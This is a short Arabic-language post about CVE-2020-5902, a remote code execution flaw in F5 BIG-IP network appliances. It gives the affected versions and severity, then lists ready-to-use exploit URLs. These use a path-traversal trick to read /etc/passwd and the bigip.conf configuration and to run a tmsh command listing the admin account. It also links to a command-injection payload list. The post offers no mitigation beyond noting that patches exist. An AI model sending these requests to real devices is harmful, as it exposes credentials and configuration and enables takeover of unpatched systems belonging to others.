
BIG-IP F5 تنفيذ الأكواد عن بُعد
تنفيذ التعليمات البرمجية عن بُعد في BIG-IP F5
تستهدف هذه الهجمات أجهزة BIG-IP، وهي أجهزة شبكات متعددة الأغراض من تصنيع F5 Networks. يمكن تهيئة أجهزة BIG-IP للعمل كأنظمة تشكيل حركة المرور، وموازنات التحميل، وجدران الحماية، وبوابات الوصول، ومحددات المعدل، أو وسيط SSL.
في يوم الأربعاء، نشرت F5 Networks تصحيحات وأصدرت نشرة أمان حول ثغرة "تنفيذ التعليمات البرمجية عن بُعد" في أجهزة BIG-IP.
ذكرت F5 أن الثغرة، التي تُتبع تحت رقم CVE-2020-5902، قد تسمح للمهاجمين بالسيطرة الكاملة على الأنظمة غير المُصححة التي يمكن الوصول إليها عبر الإنترنت.
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability : Remote Code Execution (RCE)
Score CVE : 10/10
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://github.com/payloadbox/command-injection-payload-list
https://twitter.com/Nep_1337_1998/status/1279610946864820225
https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/